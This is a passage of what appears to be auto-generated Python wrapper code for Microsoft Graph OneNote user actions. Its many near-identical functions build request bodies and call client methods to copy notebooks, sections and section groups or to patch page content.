def usersactions_usersonenotepagesparentnotebooksectiongroupssection_copy_to_section_group(client,
user_id,
onenote_page_id,
section_group_id,
onenote_section_id,
id_=None,
group_id=None,
rename_as=None,
site_collection_id=None,
site_id=None):
body = {}
if id_ is not None:
body['id'] = id_
if group_id is not None:
body['group_id'] = group_id
if rename_as is not None:
body['rename_as'] = rename_as
if site_collection_id is not None:
body['site_collection_id'] = site_collection_id
if site_id is not None:
body['site_id'] = site_id
return client.copy_to_section_group(user_id=user_id,
onenote_page_id=onenote_page_id,
section_group_id=section_group_id,
onenote_section_id=onenote_section_id,
body=body)
def usersactions_usersonenotepagesparentnotebooksectiongroupssectionspage_copy_to_section(client,
user_id,
onenote_page_id,
section_group_id,
onenote_section_id,
onenote_page_id1,
id_=None,
group_id=None,
site_collection_id=None,
site_id=None):
body = {}
if id_ is not None:
body['id'] = id_
if group_id is not None:
body['group_id'] = group_id
if site_collection_id is not None:
body['site_collection_id'] = site_collection_id
if site_id is not None:
body['site_id'] = site_id
return client.copy_to_section(user_id=user_id,
onenote_page_id=onenote_page_id,
section_group_id=section_group_id,
onenote_section_id=onenote_section_id,
onenote_page_id1=onenote_page_id1,
body=body)
def usersactions_usersonenotepagesparentnotebooksectiongroupssectionspage_onenote_patch_content(client,
user_id,
onenote_page_id,
section_group_id,
onenote_section_id,
onenote_page_id1,
commands=None):
body = {}
if commands is not None:
body['commands'] = commands
return client.onenote_patch_content(user_id=user_id,
onenote_page_id=onenote_page_id,
section_group_id=section_group_id,
onenote_section_id=onenote_section_id,
onenote_page_id1=onenote_page_id1,
body=body)
def usersactions_usersonenotepagesparentnotebooksectiongroupssectionsparentnotebook_copy_notebook(client,
user_id,
onenote_page_id,
section_group_id,
onenote_section_id,
group_id=None,
rename_as=None,
notebook_folder=None,
site_collection_id=None,
site_id=None):
body = {}
if group_id is not None:
body['group_id'] = group_id
if rename_as is not None:
body['rename_as'] = rename_as
if notebook_folder is not None:
body['notebook_folder'] = notebook_folder
if site_collection_id is not None:
body['site_collection_id'] = site_collection_id
if site_id is not None:
body['site_id'] = site_id
return client.copy_notebook(user_id=user_id,
onenote_page_id=onenote_page_id,
section_group_id=section_group_id,
onenote_section_id=onenote_section_id,
body=body)
def usersactions_usersonenotepagesparentnotebooksection_copy_to_notebook(client,
user_id,
onenote_page_id,
onenote_section_id,
id_=None,
group_id=None,
rename_as=None,
site_collection_id=None,
site_id=None):
body = {}
if id_ is not None:
body['id'] = id_
if group_id is not None:
body['group_id'] = group_id
if rename_as is not None:
body['rename_as'] = rename_as
if site_collection_id is not None:
body['site_collection_id'] = site_collection_id
if site_id is not None:
body['site_id'] = site_id
return client.copy_to_notebook(user_id=user_id,
onenote_page_id=onenote_page_id,
onenote_section_id=onenote_section_id,
body=body)
def usersactions_usersonenotepagesparentnotebooksection_copy_to_section_group(client,
user_id,
onenote_page_id,
onenote_section_id,
id_=None,
group_id=None,
rename_as=None,
site_collection_id=None,
site_id=None):
body = {}
if id_ is not None:
body['id'] = id_
if group_id is not None:
body['group_id'] = group_id
if rename_as is not None:
body['rename_as'] = rename_as
if site_collection_id is not None:
body['site_collection_id'] = site_collection_id
if site_id is not None:
body['site_id'] = site_id
return client.copy_to_section_group(user_id=user_id,
onenote_page_id=onenote_page_id,
onenote_section_id=onenote_section_id,
body=body)
def usersactions_usersonenotepagesparentnotebooksectionspage_copy_to_section(client,
user_id,
onenote_page_id,
onenote_section_id,
onenote_page_id1,
id_=None,
group_id=None,
site_collection_id=None,
site_id=None):
body = {}
if id_ is not None:
body['id'] = id_
if group_id is not None:
body['group_id'] = group_id
if site_collection_id is not None:
body['site_collection_id'] = site_collection_id
if site_id is not None:
body['site_id'] = site_id
return client.copy_to_section(user_id=user_id,
onenote_page_id=onenote_page_id,
onenote_section_id=onenote_section_id,
onenote_page_id1=onenote_page_id1,
body=body)
def usersactions_usersonenotepagesparentnotebooksectionspage_onenote_patch_content(client,
user_id,
onenote_page_id,
onenote_section_id,
onenote_page_id1,
commands=None):
body = {}
if commands is not None:
body['commands'] = commands
return client.onenote_patch_content(user_id=user_id,
onenote_page_id=onenote_page_id,
onenote_section_id=onenote_section_id,
onenote_page_id1=onenote_page_id1,
body=body)
def usersactions_usersonenotepagesparentnotebooksectionsparentnotebook_copy_notebook(client,
user_id,
onenote_page_id,
onenote_section_id,
group_id=None,
rename_as=None,
notebook_folder=None,
site_collection_id=None,
site_id=None):
body = {}
if group_id is not None:
body['group_id'] = group_id
if rename_as is not None:
body['rename_as'] = rename_as
if notebook_folder is not None:
body['notebook_folder'] = notebook_folder
if site_collection_id is not None:
body['site_collection_id'] = site_collection_id
if site_id is not None:
body['site_id'] = site_id
return client.copy_notebook(user_id=user_id,
onenote_page_id=onenote_page_id,
onenote_section_id=onenote_section_id,
body=body)
def usersactions_usersonenotepagesparentnotebooksectionsparentsectiongroupparentnotebook_copy_notebook(client,
user_id,
onenote_page_id,
onenote_section_id,
group_id=None,
rename_as=None,
notebook_folder=None,
site_collection_id=None,
site_id=None):
body = {}
if group_id is not None:
body['group_id'] = group_id
if rename_as is not None:
body['rename_as'] = rename_as
if notebook_folder is not None:
body['notebook_folder'] = notebook_folder
if site_collection_id is not None:
body['site_collection_id'] = site_collection_id
if site_id is not None:
body['site_id'] = site_id
return client.copy_notebook(user_id=user_id,
onenote_page_id=onenote_page_id,
onenote_section_id=onenote_section_id,
body=body)
def usersactions_usersonenotepagesparentnotebooksectionsparentsectiongroupsection_copy_to_notebook(client,
user_id,
onenote_page_id,
onenote_section_id,
onenote_section_id1,
id_=None,
group_id=None,
rename_as=None,
site_collection_id=None,
site_id=None):
body = {}
if id_ is not None:
body['id'] = id_
if group_id is not None:
body['group_id'] = group_id
if rename_as is not None:
body['rename_as'] = rename_as
if site_collection_id is not None:
body['site_collection_id'] = site_collection_id
if site_id is not None:
body['site_id'] = site_id
return client.copy_to_notebook(user_id=user_id,
onenote_page_id=onenote_page_id,
onenote_section_id=onenote_section_id,
onenote_section_id1=onenote_section_id1,
body=body)
def usersactions_usersonenotepagesparentnotebooksectionsparentsectiongroupsection_copy_to_section_group(client,
user_id,
onenote_page_id,
onenote_section_id,
onenote_section_id1,
id_=None,
group_id=None,
rename_as=None,
site_collection_id=None,
site_id=None):
body = {}
if id_ is not None:
body['id'] = id_
if group_id is not None:
body['group_id'] = group_id
if rename_as is not None:
body['rename_as'] = rename_as
if site_collection_id is not None:
body['site_collection_id'] = site_collection_id
if site_id is not None:
body['site_id'] = site_id
return client.copy_to_section_group(user_id=user_id,
onenote_page_id=onenote_page_id,
onenote_section_id=onenote_section_id,
onenote_section_id1=onenote_section_id1,
body=body)
def usersactions_usersonenotepagesparentsection_copy_to_notebook(client,
user_id,
onenote_page_id,
id_=None,
group_id=None,
rename_as=None,
site_collection_id=None,
site_id=None):
body = {}
if id_ is not None:
body['id'] = id_
if group_id is not None:
body['group_id'] = group_id
if rename_as is not None:
body['rename_as'] = rename_as
if site_collection_id is not None:
body['site_collection_id'] = site_collection_id
if site_id is not None:
body['site_id'] = site_id
return client.copy_to_notebook(user_id=user_id,
onenote_page_id=onenote_page_id,
body=body)
def usersactions_usersonenotepagesparentsection_copy_to_section_group(client,
user_id,
onenote_page_id,
id_=None,
group_id=None,
rename_as=None,
site_collection_id=None,
site_id=None):
body = {}
if id_ is not None:
body['id'] = id_
if group_id is not None:
body['group_id'] = group_id
if rename_as is not None:
body['rename_as'] = rename_as
if site_collection_id is not None:
body['site_collection_id'] = site_collection_id
if site_id is not None:
body['site_id'] = site_id
return client.copy_to_section_group(user_id=user_id,
onenote_page_id=onenote_page_id,
body=body)
def usersactions_usersonenotepagesparentsectionpage_copy_to_section(client,
user_id,
onenote_page_id,
onenote_page_id1,
id_=None,
group_id=None,
site_collection_id=None,
site_id=None):
body = {}
if id_ is not None:
body['id'] = id_
if group_id is not None:
body['group_id'] = group_id
if site_collection_id is not None:
body['site_collection_id'] = site_collection_id
if site_id is not None:
body['site_id'] = site_id
return client.copy_to_section(user_id=user_id,
onenote_page_id=onenote_page_id,
onenote_page_id1=onenote_page_id1,
body=body)
def usersactions_usersonenotepagesparentsectionpage_onenote_patch_content(client,
user_id,
onenote_page_id,
onenote_page_id1,
commands=None):
body = {}
if commands is not None:
body['commands'] = commands
return client.onenote_patch_content(user_id=user_id,
onenote_page_id=onenote_page_id,
onenote_page_id1=onenote_page_id1,
body=body)
def usersactions_usersonenotepagesparentsectionparentnotebook_copy_notebook(client,
user_id,
onenote_page_id,
group_id=None,
rename_as=None,
notebook_folder=None,
site_collection_id=None,
site_id=None):
body = {}
if group_id is not None:
body['group_id'] = group_id
if rename_as is not None:
body['rename_as'] = rename_as
if notebook_folder is not None:
body['notebook_folder'] = notebook_folder
if site_collection_id is not None:
body['site_collection_id'] = site_collection_id
if site_id is not None:
body['site_id'] = site_id
return client.copy_notebook(user_id=user_id,
onenote_page_id=onenote_page_id,
body=body)
def usersactions_usersonenotepagesparentsectionparentnotebooksectiongroupsparentnotebook_copy_notebook(client,
user_id,
onenote_page_id,
section_group_id,
group_id=None,
rename_as=None,
notebook_folder=None,
site_collection_id=None,
site_id=None):
body = {}
if group_id is not None:
body['group_id'] = group_id
if rename_as is not None:
body['rename_as'] = rename_as
if notebook_folder is not None:
body['notebook_folder'] = notebook_folder
if site_collection_id is not None:
body['site_collection_id'] = site_collection_id
if site_id is not None:
body['site_id'] = site_id
return client.copy_notebook(user_id=user_id,
onenote_page_id=onenote_page_id,
section_group_id=section_group_id,
body=body)
def usersactions_usersonenotepagesparentsectionparentnotebooksectiongroupssection_copy_to_notebook(client,
user_id,
onenote_page_id,
section_group_id,
onenote_section_id,
id_=None,
group_id=None,
rename_as=None,
site_collection_id=None,
site_id=None):
body = {}
if id_ is not None:
body['id'] = id_
if group_id is not None:
body['group_id'] = group_id
if rename_as is not None:
body['rename_as'] = rename_as
if site_collection_id is not None:
body['site_collection_id'] = site_collection_id
if site_id is not None:
body['site_id'] = site_id
return client.copy_to_notebook(user_id=user_id,
onenote_page_id=onenote_page_id,
section_group_id=section_group_id,
onenote_section_id=onenote_section_id,
body=body)
def usersactions_usersonenotepagesparentsectionparentnotebooksectiongroupssection_copy_to_section_group(client,
user_id,
onenote_page_id,
section_group_id,
onenote_section_id,
id_=None,
group_id=None,
rename_as=None,
site_collection_id=None,
site_id=None):
body = {}
if id_ is not None:
body['id'] = id_
if group_id is not None:
body['group_id'] = group_id
if rename_as is not None:
body['rename_as'] = rename_as
if site_collection_id is not None:
body['site_collection_id'] = site_collection_id
if site_id is not None:
body['site_id'] = site_id
return client.copy_to_section_group(user_id=user_id,
onenote_page_id=onenote_page_id,
section_group_id=section_group_id,
onenote_section_id=onenote_section_id,
body=body)
def usersactions_usersonenotepagesparentsectionparentnotebooksection_copy_to_notebook(client,
user_id,
onenote_page_id,
onenote_section_id,
id_=None,
group_id=None,
rename_as=None,
site_collection_id=None,
site_id=None):
body = {}
if id_ is not None:
body['id'] = id_
if group_id is not None:
body['group_id'] = group_id
if rename_as is not None:
body['rename_as'] = rename_as
if site_collection_id is not None:
body['site_collection_id'] = site_collection_id
if site_id is not None:
body['site_id'] = site_id
return client.copy_to_notebook(user_id=user_id,
onenote_page_id=onenote_page_id,
onenote_section_id=onenote_section_id,
body=body)
def usersactions_usersonenotepagesparentsectionparentnotebooksection_copy_to_section_group(client,
user_id,
onenote_page_id,
onenote_section_id,
id_=None,
group_id=None,
rename_as=None,
site_collection_id=None,
site_id=None):
body = {}
if id_ is not None:
body['id'] = id_
if group_id is not None:
body['group_id'] = group_id
if rename_as is not None:
body['rename_as'] = rename_as
if site_collection_id is not None:
body['site_collection_id'] = site_collection_id
if site_id is not None:
body['site_id'] = site_id
return client.copy_to_section_group(user_id=user_id,
onenote_page_id=onenote_page_id,
onenote_section_id=onenote_section_id,
body=body)
def usersactions_usersonenotepagesparentsectiongroupparentnotebook_copy_notebook(client,
user_id,
onenote_page_id,
group_id=None,
rename_as=None,
notebook_folder=None,
site_collection_id=None,
site_id=None):
body = {}
if group_id is not None:
body['group_id'] = group_id
if rename_as is not None:
body['rename_as'] = rename_as
if notebook_folder is not None:
body['notebook_folder'] = notebook_folder
if site_collection_id is not None:
body['site_collection_id'] = site_collection_id
if site_id is not None:
body['site_id'] = site_id
return client.copy_notebook(user_id=user_id,
onenote_page_id=onenote_page_id,
body=body)
def usersactions_usersonenotepagesparentsectiongroupparentnotebooksection_copy_to_notebook(client,
user_id,
onenote_page_id,
onenote_section_id,
id_=None,
group_id=None,
rename_as=None,
site_collection_id=None,
site_id=None):
body = {}
if id_ is not None:
body['id'] = id_
if group_id is not None:
body['group_id'] = group_id
if rename_as is not None:
body['rename_as'] = rename_as
if site_collection_id is not None:
body['site_collection_id'] = site_collection_id
if site_id is not None:
body['site_id'] = site_id
return client.copy_to_notebook(user_id=user_id,
onenote_page_id=onenote_page_id,
onenote_section_id=onenote_section_id,
body=body)
def usersactions_usersonenotepagesparentsectiongroupparentnotebooksection_copy_to_section_group(client,
user_id,
onenote_page_id,
onenote_section_id,
id_=None,
group_id=None,
rename_as=None,
site_collection_id=None,
site_id=None):
body = {}
if id_ is not None:
body['id'] = id_
if group_id is not None:
body['group_id'] = group_id
if rename_as is not None:
body['rename_as'] = rename_as
if site_collection_id is not None:
body['site_collection_id'] = site_collection_id
if site_id is not None:
body['site_id'] = site_id
return client.copy_to_section_group(user_id=user_id,
onenote_page_id=onenote_page_id,
onenote_section_id=onenote_section_id,
body=body)
def usersactions_usersonenotepagesparentsectiongroupsection_copy_to_notebook(client,
user_id,
onenote_page_id,
onenote_section_id,
id_=None,
group_id=None,
rename_as=None,
site_collection_id=None,
site_id=None):
body = {}
if id_ is not None:
body['id'] = id_
if group_id is not None:
body['group_id'] = group_id
if rename_as is not None:
body['rename_as'] = rename_as
if site_collection_id is not None:
body['site_collection_id'] = site_collection_id
if site_id is not None:
body['site_id'] = site_id
return client.copy_to_notebook(user_id=user_id,
onenote_page_id=onenote_page_id,
onenote_section_id=onenote_section_id,
body=body)
def usersactions_usersonenotepagesparentsectiongroupsection_copy_to_section_group(client,
user_id,
onenote_page_id,
onenote_section_id,
id_=None,
group_id=None,
rename_as=None,
site_collection_id=None,
site_id=None):
body = {}
if id_ is not None:
body['id'] = id_
if group_id is not None:
body['group_id'] = group_id
if rename_as is not None:
body['rename_as'] = rename_as
if site_collection_id is not None:
body['site_collection_id'] = site_collection_id
if site_id is not None:
body['site_id'] = site_id
return client.copy_to_section_group(user_id=user_id,
onenote_page_id=onenote_page_id,
onenote_section_id=onenote_section_id,
body=body)
def usersactions_usersonenotesectiongroupsparentnotebook_copy_notebook(client,
user_id,
section_group_id,
group_id=None,
rename_as=None,
notebook_folder=None,
site_collection_id=None,
site_id=None):
body = {}
if group_id is not None:
body['group_id'] = group_id
if rename_as is not None:
body['rename_as'] = rename_as
if notebook_folder is not None:
body['notebook_folder'] = notebook_folder
if site_collection_id is not None:
body['site_collection_id'] = site_collection_id
if site_id is not None:
body['site_id'] = site_id
return client.copy_notebook(user_id=user_id,
section_group_id=section_group_id,
body=body)
def usersactions_usersonenotesectiongroupsparentnotebooksection_copy_to_notebook(client,
user_id,
section_group_id,
onenote_section_id,
id_=None,
group_id=None,
rename_as=None,
site_collection_id=None,
site_id=None):
body = {}
if id_ is not None:
body['id'] = id_
if group_id is not None:
body['group_id'] = group_id
if rename_as is not None:
body['rename_as'] = rename_as
if site_collection_id is not None:
body['site_collection_id'] = site_collection_id
if site_id is not None:
body['site_id'] = site_id
return client.copy_to_notebook(user_id=user_id,
section_group_id=section_group_id,
onenote_section_id=onenote_section_id,
body=body)
def usersactions_usersonenotesectiongroupsparentnotebooksection_copy_to_section_group(client,
user_id,
section_group_id,
onenote_section_id,
id_=None,
group_id=None,
rename_as=None,
site_collection_id=None,
site_id=None):
body = {}
if id_ is not None:
body['id'] = id_
if group_id is not None:
body['group_id'] = group_id
if rename_as is not None:
body['rename_as'] = rename_as
if site_collection_id is not None:
body['site_collection_id'] = site_collection_id
if site_id is not None:
body['site_id'] = site_id
return client.copy_to_section_group(user_id=user_id,
section_group_id=section_group_id,
onenote_section_id=onenote_section_id,
body=body)
def usersactions_usersonenotesectiongroupsparentnotebooksectionspage_copy_to_section(client,
user_id,
section_group_id,
onenote_section_id,
onenote_page_id,
id_=None,
group_id=None,
site_collection_id=None,
site_id=None):
body = {}
if id_ is not None:
body['id'] = id_
if group_id is not None:
body['group_id'] = group_id
if site_collection_id is not None:
body['site_collection_id'] = site_collection_id
if site_id is not None:
body['site_id'] = site_id
return client.copy_to_section(user_id=user_id,
section_group_id=section_group_id,
onenote_section_id=onenote_section_id,
onenote_page_id=onenote_page_id,
body=body)
def usersactions_usersonenotesectiongroupsparentnotebooksectionspage_onenote_patch_content(client,
user_id,
section_group_id,
onenote_section_id,
onenote_page_id,
commands=None):
body = {}
if commands is not None:
body['commands'] = commands
return client.onenote_patch_content(user_id=user_id,
section_group_id=section_group_id,
onenote_section_id=onenote_section_id,
onenote_page_id=onenote_page_id,
body=body)
def usersactions_usersonenotesectiongroupsparentnotebooksectionspagesparentnotebook_copy_notebook(client,
user_id,
section_group_id,
onenote_section_id,
onenote_page_id,
group_id=None,
rename_as=None,
notebook_folder=None,
site_collection_id=None,
site_id=None):
body = {}
if group_id is not None:
body['group_id'] = group_id
if rename_as is not None:
body['rename_as'] = rename_as
if notebook_folder is not None:
body['notebook_folder'] = notebook_folder
if site_collection_id is not None:
body['site_collection_id'] = site_collection_id
if site_id is not None:
body['site_id'] = site_id
return client.copy_notebook(user_id=user_id,
section_group_id=section_group_id,
onenote_section_id=onenote_section_id,
onenote_page_id=onenote_page_id,
body=body)
def usersactions_usersonenotesectiongroupsparentnotebooksectionspagesparentsection_copy_to_notebook(client,
user_id,
section_group_id,
onenote_section_id,
onenote_page_id,
id_=None,
group_id=None,
rename_as=None,
site_collection_id=None,
site_id=None):
body = {}
if id_ is not None:
body['id'] = id_
if group_id is not None:
body['group_id'] = group_id
if rename_as is not None:
body['rename_as'] = rename_as
if site_collection_id is not None:
body['site_collection_id'] = site_collection_id
if site_id is not None:
body['site_id'] = site_id
return client.copy_to_notebook(user_id=user_id,
section_group_id=section_group_id,
onenote_section_id=onenote_section_id,
onenote_page_id=onenote_page_id,
body=body)
def usersactions_usersonenotesectiongroupsparentnotebooksectionspagesparentsection_copy_to_section_group(client,
user_id,
section_group_id,
onenote_section_id,
onenote_page_id,
id_=None,
group_id=None,
rename_as=None,
site_collection_id=None,
site_id=None):
body = {}
if id_ is not None:
body['id'] = id_
if group_id is not None:
body['group_id'] = group_id
if rename_as is not None:
body['rename_as'] = rename_as
if site_collection_id is not None:
body['site_collection_id'] = site_collection_id
if site_id is not None:
body['site_id'] = site_id
return client.copy_to_section_group(user_id=user_id,
section_group_id=section_group_id,
onenote_section_id=onenote_section_id,
onenote_page_id=onenote_page_id,
body=body)
def usersactions_usersonenotesectiongroupsparentnotebooksectionsparentnotebook_copy_notebook(client,
user_id,
section_group_id,
onenote_section_id,
group_id=None,
rename_as=None,
notebook_folder=None,
site_collection_id=None,
site_id=None):
body = {}
if group_id is not None:
body['group_id'] = group_id
if rename_as is not None:
body['rename_as'] = rename_as
if notebook_folder is not None:
body['notebook_folder'] = notebook_folder
if site_collection_id is not None:
body['site_collection_id'] = site_collection_id
if site_id is not None:
body['site_id'] = site_id
return client.copy_notebook(user_id=user_id,
section_group_id=section_group_id,
onenote_section_id=onenote_section_id,
body=body)
def usersactions_usersonenotesectiongroupssection_copy_to_notebook(client,
user_id,
section_group_id,
onenote_section_id,
id_=None,
group_id=None,
rename_as=None,
site_collection_id=None,
site_id=None):
body = {}
if id_ is not None:
body['id'] = id_
if group_id is not None:
body['group_id'] = group_id
if rename_as is not None:
body['rename_as'] = rename_as
if site_collection_id is not None:
body['site_collection_id'] = site_collection_id
if site_id is not None:
body['site_id'] = site_id
return client.copy_to_notebook(user_id=user_id,
section_group_id=section_group_id,
onenote_section_id=onenote_section_id,
body=body)
def usersactions_usersonenotesectiongroupssection_copy_to_section_group(client,
user_id,
section_group_id,
onenote_section_id,
id_=None,
group_id=None,
rename_as=None,
site_collection_id=None,
site_id=None):
body = {}
if id_ is not None:
body['id'] = id_
if group_id is not None:
body['group_id'] = group_id
if rename_as is not None:
body['rename_as'] = rename_as
if site_collection_id is not None:
body['site_collection_id'] = site_collection_id
if site_id is not None:
body['site_id'] = site_id
return client.copy_to_section_group(user_id=user_id,
section_group_id=section_group_id,
onenote_section_id=onenote_section_id,
body=body)
def usersactions_usersonenotesectiongroupssectionspage_copy_to_section(client,
user_id,
section_group_id,
onenote_section_id,
onenote_page_id,
id_=None,
group_id=None,
site_collection_id=None,
site_id=None):
body = {}
if id_ is not None:
body['id'] = id_
if group_id is not None:
body['group_id'] = group_id
if site_collection_id is not None:
body['site_collection_id'] = site_collection_id
if site_id is not None:
body['site_id'] = site_id
return client.copy_to_section(user_id=user_id,
section_group_id=section_group_id,
onenote_section_id=onenote_section_id,
onenote_page_id=onenote_page_id,
body=body)
def usersactions_usersonenotesectiongroupssectionspage_onenote_patch_content(client,
user_id,
section_group_id,
onenote_section_id,
onenote_page_id,
commands=None):
body = {}
if commands is not None:
body['commands'] = commands
return client.onenote_patch_content(user_id=user_id,
section_group_id=section_group_id,
onenote_section_id=onenote_section_id,
onenote_page_id=onenote_page_id,
body=body)
def usersactions_usersonenotesectiongroupssectionspagesparentnotebook_copy_notebook(client,
user_id,
section_group_id,
onenote_section_id,
onenote_page_id,
group_id=None,
rename_as=None,
notebook_folder=None,
site_collection_id=None,
site_id=None):
body = {}
if group_id is not None:
body['group_id'] = group_id
if rename_as is not None:
body['rename_as'] = rename_as
if notebook_folder is not None:
body['notebook_folder'] = notebook_folder
if site_collection_id is not None:
body['site_collection_id'] = site_collection_id
if site_id is not None:
body['site_id'] = site_id
return client.copy_notebook(user_id=user_id,
section_group_id=section_group_id,
onenote_section_id=onenote_section_id,
onenote_page_id=onenote_page_id,
body=body)
def usersactions_usersonenotesectiongroupssectionspagesparentnotebooksection_copy_to_notebook(client,
user_id,
section_group_id,
onenote_section_id,
onenote_page_id,
onenote_section_id1,
id_=None,
group_id=None,
rename_as=None,
site_collection_id=None,
site_id=None):
body = {}
if id_ is not None:
body['id'] = id_
if group_id is not None:
body['group_id'] = group_id
if rename_as is not None:
body['rename_as'] = rename_as
if site_collection_id is not None:
body['site_collection_id'] = site_collection_id
if site_id is not None:
body['site_id'] = site_id
return client.copy_to_notebook(user_id=user_id,
section_group_id=section_group_id,
onenote_section_id=onenote_section_id,
onenote_page_id=onenote_page_id,
onenote_section_id1=onenote_section_id1,
body=body)
def usersactions_usersonenotesectiongroupssectionspagesparentnotebooksection_copy_to_section_group(client,
user_id,
section_group_id,
onenote_section_id,
onenote_page_id,
onenote_section_id1,
id_=None,
group_id=None,
rename_as=None,
site_collection_id=None,
site_id=None):
body = {}
if id_ is not None:
body['id'] = id_
if group_id is not None:
body['group_id'] = group_id
if rename_as is not None:
body['rename_as'] = rename_as
if site_collection_id is not None:
body['site_collection_id'] = site_collection_id
if site_id is not None:
body['site_id'] = site_id
return client.copy_to_section_group(user_id=user_id,
section_group_id=section_group_id,
onenote_section_id=onenote_section_id,
onenote_page_id=onenote_page_id,
onenote_section_id1=onenote_section_id1,
body=body)
def usersactions_usersonenotesectiongroupssectionspagesparentsection_copy_to_notebook(client,
user_id,
section_group_id,
onenote_section_id,
onenote_page_id,
id_=None,
group_id=None,
rename_as=None,
site_collection_id=None,
site_id=None):
body = {}
if id_ is not None:
body['id'] = id_
if group_id is not None:
body['group_id'] = group_id
if rename_as is not None:
body['rename_as'] = rename_as
if site_collection_id is not None:
body['site_collection_id'] = site_collection_id
if site_id is not None:
body['site_id'] = site_id
return client.copy_to_notebook(user_id=user_id,
section_group_id=section_group_id,
onenote_section_id=onenote_section_id,
onenote_page_id=onenote_page_id,
body=body)
def usersactions_usersonenotesectiongroupssectionspagesparentsection_copy_to_section_group(client,
user_id,
section_group_id,
onenote_section_id,
onenote_page_id,
id_=None,
group_id=None,
rename_as=None,
site_collection_id=None,
site_id=None):
body = {}
if id_ is not None:
body['id'] = id_
if group_id is not None:
body['group_id'] = group_id
if rename_as is not None:
body['rename_as'] = rename_as
if site_collection_id is not None:
body['site_collection_id'] = site_collection_id
if site_id is not None:
body['site_id'] = site_id
return client.copy_to_section_group(user_id=user_id,
section_group_id=section_group_id,
onenote_section_id=onenote_section_id,
onenote_page_id=onenote_page_id,
body=body)
def usersactions_usersonenotesectiongroupssectionsparentnotebook_copy_notebook(client,
user_id,
section_group_id,
onenote_section_id,
group_id=None,
rename_as=None,
notebook_folder=None,
site_collection_id=None,
site_id=None):
body = {}
if group_id is not None:
body['group_id'] = group_id
if rename_as is not None:
body['rename_as'] = rename_as
if notebook_folder is not None:
body['notebook_folder'] = notebook_folder
if site_collection_id is not None:
body['site_collection_id'] = site_collection_id
if site_id is not None:
body['site_id'] = site_id
return client.copy_notebook(user_id=user_id,
section_group_id=section_group_id,
onenote_section_id=onenote_section_id,
body=body)
def usersactions_usersonenotesectiongroupssectionsparentnotebooksection_copy_to_notebook(client,
user_id,
section_group_id,
onenote_section_id,
onenote_section_id1,
id_=None,
group_id=None,
rename_as=None,
site_collection_id=None,
site_id=None):
body = {}
if id_ is not None:
body['id'] = id_
if group_id is not None:
body['group_id'] = group_id
if rename_as is not None:
body['rename_as'] = rename_as
if site_collection_id is not None:
body['site_collection_id'] = site_collection_id
if site_id is not None:
body['site_id'] = site_id
return client.copy_to_notebook(user_id=user_id,
section_group_id=section_group_id,
onenote_section_id=onenote_section_id,
onenote_section_id1=onenote_section_id1,
body=body)
def usersactions_usersonenotesectiongroupssectionsparentnotebooksection_copy_to_section_group(client,
user_id,
section_group_id,
onenote_section_id,
onenote_section_id1,
id_=None,
group_id=None,
rename_as=None,
site_collection_id=None,
site_id=None):
body = {}
if id_ is not None:
body['id'] = id_
if group_id is not None:
body['group_id'] = group_id
if rename_as is not None:
body['rename_as'] = rename_as
if site_collection_id is not None:
body['site_collection_id'] = site_collection_id
if site_id is not None:
body['site_id'] = site_id
return client.copy_to_section_group(user_id=user_id,
section_group_id=section_group_id,
onenote_section_id=onenote_section_id,
onenote_section_id1=onenote_section_id1,
body=body)
def usersactions_usersonenotesection_copy_to_notebook(client,
user_id,
onenote_section_id,
id_=None,
group_id=None,
rename_as=None,
site_collection_id=None,
site_id=None):
body = {}
if id_ is not None:
body['id'] = id_
if group_id is not None:
body['group_id'] = group_id
if rename_as is not None:
body['rename_as'] = rename_as
if site_collection_id is not None:
body['site_collection_id'] = site_collection_id
if site_id is not None:
body['site_id'] = site_id
return client.copy_to_notebook(user_id=user_id,
onenote_section_id=onenote_section_id,
body=body)
def usersactions_usersonenotesection_copy_to_section_group(client,
user_id,
onenote_section_id,
id_=None,
group_id=None,
rename_as=None,
site_collection_id=None,
site_id=None):
body = {}
if id_ is not None:
body['id'] = id_
if group_id is not None:
body['group_id'] = group_id
if rename_as is not None:
body['rename_as'] = rename_as
if site_collection_id is not None:
body['site_collection_id'] = site_collection_id
if site_id is not None:
body['site_id'] = site_id
return client.copy_to_section_group(user_id=user_id,
onenote_section_id=onenote_section_id,
body=body)
def usersactions_usersonenotesectionspage_copy_to_section(client,
user_id,
onenote_section_id,
onenote_page_id,
id_=None,
group_id=None,
site_collection_id=None,
site_id=None):
body = {}
if id_ is not None:
body['id'] = id_
if group_id is not None:
body['group_id'] = group_id
if site_collection_id is not None:
body['site_collection_id'] = site_collection_id
if site_id is not None:
body['site_id'] = site_id
return client.copy_to_section(user_id=user_id,
onenote_section_id=onenote_section_id,
onenote_page_id=onenote_page_id,
body=body)
def usersactions_usersonenotesectionspage_onenote_patch_content(client,
user_id,
onenote_section_id,
onenote_page_id,
commands=None):
body = {}
if commands is not None:
body['commands'] = commands
return client.onenote_patch_content(user_id=user_id,
onenote_section_id=onenote_section_id,
onenote_page_id=onenote_page_id,
body=body)
def usersactions_usersonenotesectionspagesparentnotebook_copy_notebook(client,
user_id,
onenote_section_id,
onenote_page_id,
group_id=None,
rename_as=None,
notebook_folder=None,
site_collection_id=None,
site_id=None):
body = {}
if group_id is not None:
body['group_id'] = group_id
if rename_as is not None:
body['rename_as'] = rename_as
if notebook_folder is not None:
body['notebook_folder'] = notebook_folder
if site_collection_id is not None:
body['site_collection_id'] = site_collection_id
if site_id is not None:
body['site_id'] = site_id
return client.copy_notebook(user_id=user_id,
onenote_section_id=onenote_section_id,
onenote_page_id=onenote_page_id,
body=body)
def usersactions_usersonenotesectionspagesparentnotebooksectiongroupsparentnotebook_copy_notebook(client,
user_id,
onenote_section_id,
onenote_page_id,
section_group_id,
group_id=None,
rename_as=None,
notebook_folder=None,
site_collection_id=None,
site_id=None):
body = {}
if group_id is not None:
body['group_id'] = group_id
if rename_as is not None:
body['rename_as'] = rename_as
if notebook_folder is not None:
body['notebook_folder'] = notebook_folder
if site_collection_id is not None:
body['site_collection_id'] = site_collection_id
if site_id is not None:
body['site_id'] = site_id
return client.copy_notebook(user_id=user_id,
onenote_section_id=onenote_section_id,
onenote_page_id=onenote_page_id,
section_group_id=section_group_id,
body=body)
def usersactions_usersonenotesectionspagesparentnotebooksectiongroupssection_copy_to_notebook(client,
user_id,
onenote_section_id,
onenote_page_id,
section_group_id,
onenote_section_id1,
id_=None,
group_id=None,
rename_as=None,
site_collection_id=None,
site_id=None):
body = {}
if id_ is not None:
body['id'] = id_
if group_id is not None:
body['group_id'] = group_id
if rename_as is not None:
body['rename_as'] = rename_as
if site_collection_id is not None:
body['site_collection_id'] = site_collection_id
if site_id is not None:
body['site_id'] = site_id
return client.copy_to_notebook(user_id=user_id,
